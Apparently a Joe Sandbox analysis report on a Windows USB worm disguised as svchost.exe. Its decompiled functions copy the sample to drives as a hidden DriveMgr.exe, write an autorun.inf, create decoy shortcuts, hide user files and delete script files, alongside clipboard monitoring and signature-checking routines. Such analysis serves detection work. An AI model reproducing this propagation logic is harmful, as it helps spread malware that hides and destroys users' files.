					if(OpenClipboard(0) == 0) {
						L6:
						Sleep(0xc8); // executed
						continue;
					}
					_v12 = GetClipboardData(1);
					if(_v12 != 0) {
						_v8 = GlobalLock(_v12);
						if(_v8 != 0) {
							GlobalUnlock(_v12);
							E00AB1000(_v8);
							_t17 = _t17 + 4;
						}
					}
					CloseClipboard();
					goto L6;
				}
			}

0x00000000
0x00ab1666
0x00ab1670
0x00ab16b2
0x00ab16b7
0x00000000
0x00ab16b7
0x00ab167a
0x00ab1681
0x00ab168d
0x00ab1694
0x00ab169a
0x00ab16a4
0x00ab16a9
0x00ab16a9
0x00ab1694
0x00ab16ac
0x00000000
0x00ab16ac

APIs

OpenClipboard.USER32(00000000), ref: 00AB1668
GetClipboardData.USER32 ref: 00AB1674
GlobalLock.KERNEL32 ref: 00AB1687
GlobalUnlock.KERNEL32(00000000), ref: 00AB169A
CloseClipboard.USER32 ref: 00AB16AC
Sleep.KERNELBASE(000000C8), ref: 00AB16B7

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenSleepUnlock
String ID:
API String ID: 663716087-0
Opcode ID: 51c4ac07dd80730b4eb993072b8a1aeaf59499ddedcf3a9807f1c0bda9dad0d7
Instruction ID: 8b5315f24e5fdfcc8cb653553788588ef2a02e7c7765c48eecd0f34155a19e72
Opcode Fuzzy Hash: 51c4ac07dd80730b4eb993072b8a1aeaf59499ddedcf3a9807f1c0bda9dad0d7
Instruction Fuzzy Hash: 7AF03A79900204EBD700FFE4ED6DBCD7B78AB04302F548254E902971A3DA799A89DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2600, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00AB2600() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v24;
				long _v28;
				short _v556;
				intOrPtr _v560;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				signed int _t35;
				void* _t54;
				void* _t55;

				GetModuleFileNameW(0, L"C:\\16642873124159\\svchost.exe", 0x208);
				_t29 = E00AB2880(L"C:\\16642873124159\\svchost.exe"); // executed
				_t55 = _t54 + 4;
				 *0xaba8a8 = _t29;
				while(1 != 0) {
					_t31 = E00AB1E00(); // executed
					_v8 = _t31;
					_v12 = 2;
					while(_v12 <= 0x19) {
						_t33 = E00AB1D20(_v8, _v12,  &_v24);
						_t55 = _t55 + 0xc;
						_v16 = _t33;
						_v560 = _v16;
						if(_v560 == 2 || _v560 == 4) {
							_t35 = GetVolumeInformationW( &_v24,  &_v556, 0x105, 0, 0,  &_v28, 0, 0);
							__eflags = _t35;
							if(_t35 == 0) {
								__eflags = _v16 - 4;
								__eflags = _v16 == 4;
								E00AB20C0(_v28, _v16 == 4,  &_v24, 0, 0xab6eb0, _v28, ( &_v24 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
								_t55 = _t55 + 0x14;
							} else {
								__eflags = _v16 - 4;
								E00AB20C0( &_v24, _v16 - 4,  &_v24, 1,  &_v556, _v28, (_t35 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
								_t55 = _t55 + 0x14;
							}
						}
						_v12 = _v12 + 1;
					}
					Sleep(0x7d0); // executed
				}
				ExitThread(0);
			}

0x00ab2615
0x00ab2620
0x00ab2625
0x00ab2628
0x00ab262d
0x00ab263a
0x00ab263f
0x00ab2642
0x00ab2654
0x00ab266a
0x00ab266f
0x00ab2672
0x00ab2678
0x00ab2685
0x00ab26ae
0x00ab26b4
0x00ab26b6
0x00ab26de
0x00ab26e2
0x00ab26f8
0x00ab26fd
0x00ab26b8
0x00ab26b8
0x00ab26d4
0x00ab26d9
0x00ab26d9
0x00ab26b6
0x00ab2651
0x00ab2651
0x00ab270a
0x00ab270a
0x00ab2717

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\16642873124159\svchost.exe,00000208), ref: 00AB2615

Part of subcall function 00AB2880: _wfopen.MSVCRT ref: 00AB2896
Part of subcall function 00AB2880: fseek.MSVCRT ref: 00AB28A9
Part of subcall function 00AB2880: ftell.MSVCRT ref: 00AB28B5
Part of subcall function 00AB2880: fclose.MSVCRT ref: 00AB28C4

ExitThread.KERNEL32 ref: 00AB2717

Part of subcall function 00AB1E00: GetLogicalDrives.KERNEL32 ref: 00AB1E06
Part of subcall function 00AB1E00: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00AB1E54
Part of subcall function 00AB1E00: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00AB1E81
Part of subcall function 00AB1E00: RegCloseKey.ADVAPI32(?), ref: 00AB1E9E

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00AB26AE
Sleep.KERNELBASE(000007D0), ref: 00AB270A

Strings

C:\16642873124159\svchost.exe, xrefs: 00AB260E, 00AB261B

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
String ID: C:\16642873124159\svchost.exe
API String ID: 3729102641-3382767974
Opcode ID: 4da91f8d57ea0e927d8cf4a5349b1913f93d152b2ad6581fd966db4f51b562a5
Instruction ID: 72befaedfe28436846e3b9b27ded85c36e2b0db0a6149ae8f3d2178fb1a23163
Opcode Fuzzy Hash: 4da91f8d57ea0e927d8cf4a5349b1913f93d152b2ad6581fd966db4f51b562a5
Instruction Fuzzy Hash: 3A31D5B1D40208BBDB14DBD0DD56FEF777CEB08700F10816AE606A6192E674AA84CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2880, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00AB2880(struct _IO_FILE* _a4) {
				struct _IO_FILE* _v8;
				long _v12;
				struct _IO_FILE* _t9;
				long _t11;

				_v8 = 0;
				_push(L"rb");
				_t9 = _a4;
				_push(_t9); // executed
				L00AB55B2(); // executed
				_v8 = _t9;
				fseek(_v8, 0, 2); // executed
				_t11 = ftell(_v8); // executed
				_v12 = _t11;
				fclose(_v8); // executed
				return _v12;
			}

0x00ab2886
0x00ab288d
0x00ab2892
0x00ab2895
0x00ab2896
0x00ab289e
0x00ab28a9
0x00ab28b5
0x00ab28bd
0x00ab28c4
0x00ab28d2

APIs

_wfopen.MSVCRT ref: 00AB2896
fseek.MSVCRT ref: 00AB28A9
ftell.MSVCRT ref: 00AB28B5
fclose.MSVCRT ref: 00AB28C4

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: _wfopenfclosefseekftell
String ID:
API String ID: 3257356417-0
Opcode ID: 21aa91416eb2e6066b1fbd2b64a14229837f2e337be72feaabb289e6916532a5
Instruction ID: 3586bea63691d3699faceebe08c20a75d409d0c4e29851d440eaef33af5947c5
Opcode Fuzzy Hash: 21aa91416eb2e6066b1fbd2b64a14229837f2e337be72feaabb289e6916532a5
Instruction Fuzzy Hash: 25F01CB6D00208BBDB10EFF4DE46B9E7B799B04701F1045A4F9046B242E536EB149792

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AB20C0, Relevance: 110.6, APIs: 37, Strings: 26, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00AB20C0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a12, signed int _a16, signed char _a20) {
				short _v524;
				short _v1044;
				short _v1564;
				short _v2084;
				short _v2604;
				WCHAR* _v2608;
				short _v3132;
				short _v3652;
				char _v3653;
				struct _WIN32_FIND_DATAW _v4252;
				short _v4772;
				void* _v4776;
				short _v5300;
				intOrPtr _v5304;
				FILE* _v5308;
				WCHAR* _v5312;
				WCHAR* _v5316;
				intOrPtr _v5320;
				WCHAR* _v5324;
				WCHAR* _v5328;
				WCHAR* _v5332;
				WCHAR* _v5336;
				WCHAR* _v5340;
				WCHAR* _v5344;
				WCHAR* _v5348;
				WCHAR* _v5352;
				WCHAR* _v5356;
				WCHAR* _v5360;
				WCHAR* _v5364;
				WCHAR* _v5368;
				signed char _v5369;
				signed char _v5370;
				signed int _v5376;
				signed int _v5380;
				FILE* _t165;
				intOrPtr _t183;
				intOrPtr _t184;
				void* _t241;
				void* _t242;
				void* _t248;

				E00AB55C0(0x1500, __ecx);
				if((_a16 & 0x00080000) != 0) {
					return 0;
				}
				_v2608 = L"__";
				_v3653 = 0;
				wsprintfW( &_v2084, L"%s.lnk", _a12);
				wsprintfW( &_v5300, L"%s\\%s\\DriveMgr.exe", _a4, _v2608);
				wsprintfW( &_v4772, L"%s\\%s", _a4, _v2608);
				wsprintfW( &_v3132, L"%s\\%s", _a4,  &_v2084);
				wsprintfW( &_v1564, L"%s\\*", _a4);
				wsprintfW( &_v524, L"%s\\autorun.inf", _a4);
				_t248 = _t242 + 0x54;
				if(PathFileExistsW( &_v5300) != 0) {
					_t183 = E00AB2880( &_v5300);
					_t248 = _t248 + 4;
					_v5304 = _t183;
					_t184 =  *0xaba8a8; // 0x9600
					if(_t184 != _v5304) {
						SetFileAttributesW( &_v5300, 0x80);
						DeleteFileW( &_v5300);
					}
				}
				if(PathFileExistsW( &_v5300) == 0) {
					if(PathFileExistsW( &_v4772) == 0 && CreateDirectoryW( &_v4772, 0) != 0) {
						SetFileAttributesW( &_v4772, 7);
					}
					if(PathFileExistsW( &_v4772) != 0) {
						CopyFileW(L"C:\\16642873124159\\svchost.exe",  &_v5300, 0);
						SetFileAttributesW( &_v3132, 1);
					}
				}
				if(PathFileExistsW( &_v3132) == 0) {
					if((_a20 & 0x000000ff) == 0) {
						E00AB1EC0( &_v3132,  &_v5300, L"shell32.dll", 8);
						_t248 = _t248 + 0x10;
					} else {
						E00AB1EC0( &_v3132,  &_v5300, L"shell32.dll", 9);
						_t248 = _t248 + 0x10;
					}
					SetFileAttributesW( &_v3132, 5);
				}
				if(PathFileExistsW( &_v524) == 0) {
					_push("w");
					_t165 =  &_v524;
					_push(_t165);
					L00AB55B2();
					_t248 = _t248 + 8;
					_v5308 = _t165;
					if(_v5308 != 0) {
						fwprintf(_v5308, L"[AuToRuN]\nShEllExECutE=__\\DriveMgr.exe\nUsEAuToPLaY=1");
						fclose(_v5308);
						_t248 = _t248 + 0xc;
						SetFileAttributesW( &_v524, 7);
					}
				}
				_v4776 = FindFirstFileW( &_v1564,  &_v4252);
				if(_v4776 == 0xffffffff) {
					L47:
					return _v3653;
				} else {
					_v5368 = L"*.lnk";
					_v5364 = L"*.vbs";
					_v5360 = L"*.bat";
					_v5356 = L"*.js";
					_v5352 = L"*.scr";
					_v5348 = L"*.com";
					_v5344 = L"*.jse";
					_v5340 = L"*.cmd";
					_v5336 = L"*.pif";
					_v5332 = L"*.jar";
					_v5328 = L"*.dll";
					_v5324 = L"*.vbe";
					_v5320 = _v2608;
					_v5316 =  &_v2084;
					_v5312 = L"autorun.inf";
					do {
						if(lstrcmpW( &(_v4252.cFileName), ".") != 0 && lstrcmpW( &(_v4252.cFileName), L"..") != 0) {
							_v5370 = 0;
							_v5376 = 0;
							while(_v5376 < 3) {
								if(lstrcmpiW( &(_v4252.cFileName),  *(_t241 + _v5376 * 4 - 0x14c4)) == 0) {
									_v5370 = 1;
									break;
								}
								_v5376 = _v5376 + 1;
							}
							if((_v5370 & 0x000000ff) == 0) {
								_v5369 = 0;
								_v5380 = 0;
								while(_v5380 < 0xc) {
									if(PathMatchSpecW( &(_v4252.cFileName),  *(_t241 + _v5380 * 4 - 0x14f4)) != 0) {
										wsprintfW( &_v2604, L"%s\\%s", _a4,  &(_v4252.cFileName));
										_t248 = _t248 + 0x10;
										SetFileAttributesW( &_v2604, 0x80);
										DeleteFileW( &_v2604);
										_v5369 = 1;
										break;
									}
									_v5380 = _v5380 + 1;
								}
								if((_v5369 & 0x000000ff) == 0) {
									if(PathFileExistsW( &_v4772) != 0) {
										wsprintfW( &_v3652, L"%s\\%s", _a4,  &(_v4252.cFileName));
										wsprintfW( &_v1044, L"%s\\%s\\%s", _a4, _v2608,  &(_v4252.cFileName));
										_t248 = _t248 + 0x24;
										if((_v4252.dwFileAttributes & 0x00000010) == 0) {
											MoveFileExW( &_v3652,  &_v1044, 9);
										} else {
											E00AB1F80( &_v3652,  &_v1044);
											_t248 = _t248 + 8;
										}
									}
								}
								goto L45;
							}
						}
						L45:
					} while (FindNextFileW(_v4776,  &_v4252) != 0);
					FindClose(_v4776);
					goto L47;
				}
			}

0x00ab20c8
0x00ab20d5
0x00000000
0x00ab20d7
0x00ab20de
0x00ab20e8
0x00ab20ff
0x00ab211f
0x00ab213f
0x00ab215f
0x00ab2178
0x00ab2191
0x00ab2197
0x00ab21a9
0x00ab21b2
0x00ab21b7
0x00ab21ba
0x00ab21c0
0x00ab21cb
0x00ab21d9
0x00ab21e6
0x00ab21e6
0x00ab21cb
0x00ab21fb
0x00ab220c
0x00ab222a
0x00ab222a
0x00ab223f
0x00ab224f
0x00ab225e
0x00ab225e
0x00ab223f
0x00ab2273
0x00ab227b
0x00ab22b1
0x00ab22b6
0x00ab227d
0x00ab2292
0x00ab2297
0x00ab2297
0x00ab22c2
0x00ab22c2
0x00ab22d7
0x00ab22d9
0x00ab22de
0x00ab22e4
0x00ab22e5
0x00ab22ea
0x00ab22ed
0x00ab22fa
0x00ab2308
0x00ab2317
0x00ab231c
0x00ab2328
0x00ab2328
0x00ab22fa
0x00ab2342
0x00ab234f
0x00ab25ef
0x00000000
0x00ab2355
0x00ab2355
0x00ab235f
0x00ab2369
0x00ab2373
0x00ab237d
0x00ab2387
0x00ab2391
0x00ab239b
0x00ab23a5
0x00ab23af
0x00ab23b9
0x00ab23c3
0x00ab23d3
0x00ab23df
0x00ab23e5
0x00ab23ef
0x00ab2403
0x00ab2420
0x00ab2427
0x00ab2442
0x00ab2468
0x00ab246c
0x00000000
0x00ab246c
0x00ab243c
0x00ab243c
0x00ab2480
0x00ab2487
0x00ab248e
0x00ab24a9
0x00ab24cf
0x00ab24ea
0x00ab24f0
0x00ab24ff
0x00ab250c
0x00ab2512
0x00000000
0x00ab2512
0x00ab24a3
0x00ab24a3
0x00ab2529
0x00ab253f
0x00ab255d
0x00ab2584
0x00ab258a
0x00ab2596
0x00ab25c0
0x00ab2598
0x00ab25a6
0x00ab25ab
0x00ab25ab
0x00ab2596
0x00ab253f
0x00000000
0x00ab2529
0x00ab2482
0x00ab25c6
0x00ab25da
0x00ab25e9
0x00000000
0x00ab25e9

APIs

wsprintfW.USER32 ref: 00AB20FF
wsprintfW.USER32 ref: 00AB211F
wsprintfW.USER32 ref: 00AB213F
wsprintfW.USER32 ref: 00AB215F
wsprintfW.USER32 ref: 00AB2178
wsprintfW.USER32 ref: 00AB2191
PathFileExistsW.SHLWAPI(?), ref: 00AB21A1
SetFileAttributesW.KERNEL32(?,00000080), ref: 00AB21D9
DeleteFileW.KERNEL32(?), ref: 00AB21E6
PathFileExistsW.SHLWAPI(?), ref: 00AB21F3
PathFileExistsW.SHLWAPI(?), ref: 00AB2204
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AB2217
SetFileAttributesW.KERNEL32(?,00000007), ref: 00AB222A
PathFileExistsW.SHLWAPI(?), ref: 00AB2237
CopyFileW.KERNEL32(C:\16642873124159\svchost.exe,?,00000000), ref: 00AB224F

Strings

%s\%s, xrefs: 00AB2153
*.jar, xrefs: 00AB23AF
*.lnk, xrefs: 00AB2355, 00AB24BF
*.cmd, xrefs: 00AB239B
*.com, xrefs: 00AB2387
%s\%s, xrefs: 00AB24DE
%s\%s, xrefs: 00AB2551
*.vbs, xrefs: 00AB235F
%s\%s\%s, xrefs: 00AB2578
%s\*, xrefs: 00AB216C
*.pif, xrefs: 00AB23A5
%s\autorun.inf, xrefs: 00AB2185
autorun.inf, xrefs: 00AB23E5
*.jse, xrefs: 00AB2391
shell32.dll, xrefs: 00AB229E
C:\16642873124159\svchost.exe, xrefs: 00AB224A
shell32.dll, xrefs: 00AB227F
%s\%s, xrefs: 00AB2133
*.js, xrefs: 00AB2373
*.vbe, xrefs: 00AB23C3
*.dll, xrefs: 00AB23B9
[AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1, xrefs: 00AB22FC
*.bat, xrefs: 00AB2369
%s.lnk, xrefs: 00AB20F3
*.scr, xrefs: 00AB237D
%s\%s\DriveMgr.exe, xrefs: 00AB2113

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$%s\autorun.inf$*.bat$*.cmd$*.com$*.dll$*.jar$*.js$*.jse$*.lnk$*.pif$*.scr$*.vbe$*.vbs$C:\16642873124159\svchost.exe$[AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1$autorun.inf$shell32.dll$shell32.dll
API String ID: 3542775751-1943791266
Opcode ID: 4899381dde262dee837b730317d5e40386d0d3c6cbd55e2f086fd4a1c213b6e5
Instruction ID: c0b3d39ac82592391a133c149b95b57b595620b86ba473e930c86db1e687b9c8
Opcode Fuzzy Hash: 4899381dde262dee837b730317d5e40386d0d3c6cbd55e2f086fd4a1c213b6e5
Instruction Fuzzy Hash: 99D17C759002189BCB20DFA4DC84BEA777CBF48705F4486D9F109A7162E779DA89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00AB17D0, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 178
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00AB17D0(WCHAR* _a4) {
				long* _v8;
				signed int _v9;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _t82;
				long _t92;
				intOrPtr _t96;
				long* _t99;
				long* _t120;

				_v9 = 0;
				_v8 = 0;
				_t99 =  *0xaba8a0; // 0x84f430
				if(CryptImportKey(_t99, 0xab67c0, 0x214, 0, 0,  &_v8) == 0) {
					L20:
					return _v9;
				}
				_v16 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					L19:
					CryptDestroyKey(_v8);
					goto L20;
				}
				_v20 = GetFileSize(_v16, 0);
				if(_v20 == 0) {
					L18:
					CloseHandle(_v16);
					goto L19;
				}
				_v24 = CreateFileMappingA(_v16, 0, 4, 0, 0, 0);
				if(_v24 == 0) {
					L16:
					if((_v9 & 0x000000ff) != 0) {
						SetFilePointer(_v16, _v20, 0, 0);
						SetEndOfFile(_v16);
					}
					goto L18;
				}
				_v28 = MapViewOfFile(_v24, 6, 0, 0, 0);
				if(_v28 == 0) {
					L15:
					CloseHandle(_v24);
					goto L16;
				}
				if( *_v28 != 0x2153474e ||  *((intOrPtr*)(_v28 + 4)) <= 0) {
					L14:
					UnmapViewOfFile(_v28);
					goto L15;
				} else {
					_t82 =  *((intOrPtr*)(_v28 + 4));
					if(_t82 >= _v20) {
						goto L14;
					}
					_t120 =  *0xaba8a0; // 0x84f430
					__imp__CryptCreateHash(_t120, 0x8004, 0, 0,  &_v32);
					if(_t82 == 0) {
						goto L14;
					}
					_v36 = _v28 + 8;
					_v44 = _v36 +  *((intOrPtr*)(_v28 + 4));
					_v20 = _v20 - _v44 - _v28;
					_v40 = HeapAlloc(GetProcessHeap(), 0, _v20);
					if(_v40 == 0) {
						goto L14;
					}
					E00AB16F0(_v44, _v20, _v40, _v36,  *((intOrPtr*)(_v28 + 4)));
					_t92 = _v20;
					__imp__CryptHashData(_v32, _v40, _t92, 0);
					if(_t92 != 0) {
						_t96 = _v36;
						__imp__CryptVerifySignatureA(_v32, _t96,  *((intOrPtr*)(_v28 + 4)), _v8, 0, 0);
						if(_t96 != 0) {
							_v9 = 1;
							memcpy(_v28, _v40, _v20);
						}
					}
					HeapFree(GetProcessHeap(), 0, _v40);
					goto L14;
				}
			}

0x00ab17d6
0x00ab17da
0x00ab17f3
0x00ab1802
0x00ab19e6
0x00ab19ec
0x00ab19ec
0x00ab1821
0x00ab1828
0x00ab19dc
0x00ab19e0
0x00000000
0x00ab19e0
0x00ab183a
0x00ab1841
0x00ab19d2
0x00ab19d6
0x00000000
0x00ab19d6
0x00ab185b
0x00ab1862
0x00ab19ae
0x00ab19b4
0x00ab19c2
0x00ab19cc
0x00ab19cc
0x00000000
0x00ab19b4
0x00ab187a
0x00ab1881
0x00ab19a4
0x00ab19a8
0x00000000
0x00ab19a8
0x00ab1890
0x00ab199a
0x00ab199e
0x00000000
0x00ab18a3
0x00ab18a6
0x00ab18ac
0x00000000
0x00000000
0x00ab18bf
0x00ab18c6
0x00ab18ce
0x00000000
0x00000000
0x00ab18da
0x00ab18e6
0x00ab18f4
0x00ab190a
0x00ab1911
0x00000000
0x00000000
0x00ab192e
0x00ab1938
0x00ab1944
0x00ab194c
0x00ab195d
0x00ab1965
0x00ab196d
0x00ab196f
0x00ab197f
0x00ab1984
0x00ab196d
0x00ab1994
0x00000000
0x00ab1994

APIs

CryptImportKey.ADVAPI32(0084F430,00AB67C0,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AB1CE7), ref: 00AB17FA
CreateFileW.KERNEL32(00AB1CE7,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,00AB1CE7), ref: 00AB181B
GetFileSize.KERNEL32(000000FF,00000000), ref: 00AB1834
CreateFileMappingA.KERNEL32 ref: 00AB1855
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00AB1874
CryptCreateHash.ADVAPI32(0084F430,00008004,00000000,00000000,?), ref: 00AB18C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AB18FD
HeapAlloc.KERNEL32(00000000), ref: 00AB1904

Part of subcall function 00AB16F0: memcpy.MSVCRT ref: 00AB174F
Part of subcall function 00AB16F0: memcpy.MSVCRT ref: 00AB1763
Part of subcall function 00AB16F0: CryptImportKey.ADVAPI32(0084F430,00000008,0000001C,00000000,00000000,00000000), ref: 00AB1787
Part of subcall function 00AB16F0: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 00AB17AD
Part of subcall function 00AB16F0: CryptDestroyKey.ADVAPI32(00000000), ref: 00AB17C0

CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 00AB1944
CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 00AB1965
memcpy.MSVCRT ref: 00AB197F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AB198D
HeapFree.KERNEL32(00000000), ref: 00AB1994
UnmapViewOfFile.KERNEL32(00000000), ref: 00AB199E
CloseHandle.KERNEL32(00000000), ref: 00AB19A8
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00AB19C2
SetEndOfFile.KERNEL32(000000FF), ref: 00AB19CC
CloseHandle.KERNEL32(000000FF), ref: 00AB19D6
CryptDestroyKey.ADVAPI32(00000000), ref: 00AB19E0

Strings

NGS!, xrefs: 00AB188A

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
String ID: NGS!
API String ID: 1316431928-4070929822
Opcode ID: 94396c1762df889b8d172759eda66d235f97bdb81c14a82022fc39d6add5a05c
Instruction ID: 730b2b94aa68aaf950463cb7e7c6553fd531f709c60f4eafc364755da2120ea2
Opcode Fuzzy Hash: 94396c1762df889b8d172759eda66d235f97bdb81c14a82022fc39d6add5a05c
Instruction Fuzzy Hash: 61614A75E00209AFDB14DBE5CC99FEEBBB9BB48700F148608F605B7291D775A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1F80, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB1F80(WCHAR* _a4, WCHAR* _a8) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				void* _v1120;
				short _v1644;
				short _v2164;
				void* _t29;
				void* _t60;
				void* _t61;

				CreateDirectoryW(_a8, 0);
				wsprintfW( &_v524, L"%s\\*", _a4);
				_t61 = _t60 + 0xc;
				_t29 = FindFirstFileW( &_v524,  &_v1116);
				_v1120 = _t29;
				if(_v1120 == 0xffffffff) {
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
						wsprintfW( &_v2164, L"%s\\%s", _a8,  &(_v1116.cFileName));
						_t61 = _t61 + 0x20;
						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
							MoveFileExW( &_v1644,  &_v2164, 9);
						} else {
							E00AB1F80( &_v1644,  &_v2164);
							_t61 = _t61 + 8;
						}
					}
				} while (FindNextFileW(_v1120,  &_v1116) != 0);
				FindClose(_v1120);
				return RemoveDirectoryW(_a4);
			}

0x00ab1f8f
0x00ab1fa5
0x00ab1fab
0x00ab1fbc
0x00ab1fc2
0x00ab1fcf
0x00ab20b2
0x00000000
0x00000000
0x00000000
0x00ab1fd5
0x00ab1fd5
0x00ab1fe9
0x00ab201a
0x00ab203a
0x00ab2040
0x00ab204c
0x00ab2076
0x00ab204e
0x00ab205c
0x00ab2061
0x00ab2061
0x00ab204c
0x00ab2090
0x00ab209f
0x00000000

APIs

CreateDirectoryW.KERNEL32(00AB25AB,00000000), ref: 00AB1F8F
wsprintfW.USER32 ref: 00AB1FA5
FindFirstFileW.KERNEL32(?,?), ref: 00AB1FBC
lstrcmpW.KERNEL32(?,00AB6C88), ref: 00AB1FE1
lstrcmpW.KERNEL32(?,00AB6C8C), ref: 00AB1FF7
wsprintfW.USER32 ref: 00AB201A
wsprintfW.USER32 ref: 00AB203A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00AB2076
FindNextFileW.KERNEL32(000000FF,?), ref: 00AB208A
FindClose.KERNEL32(000000FF), ref: 00AB209F
RemoveDirectoryW.KERNEL32(?), ref: 00AB20A9

Strings

%s\*, xrefs: 00AB1F99
%s\%s, xrefs: 00AB200E
%s\%s, xrefs: 00AB202E

Memory Dump Source

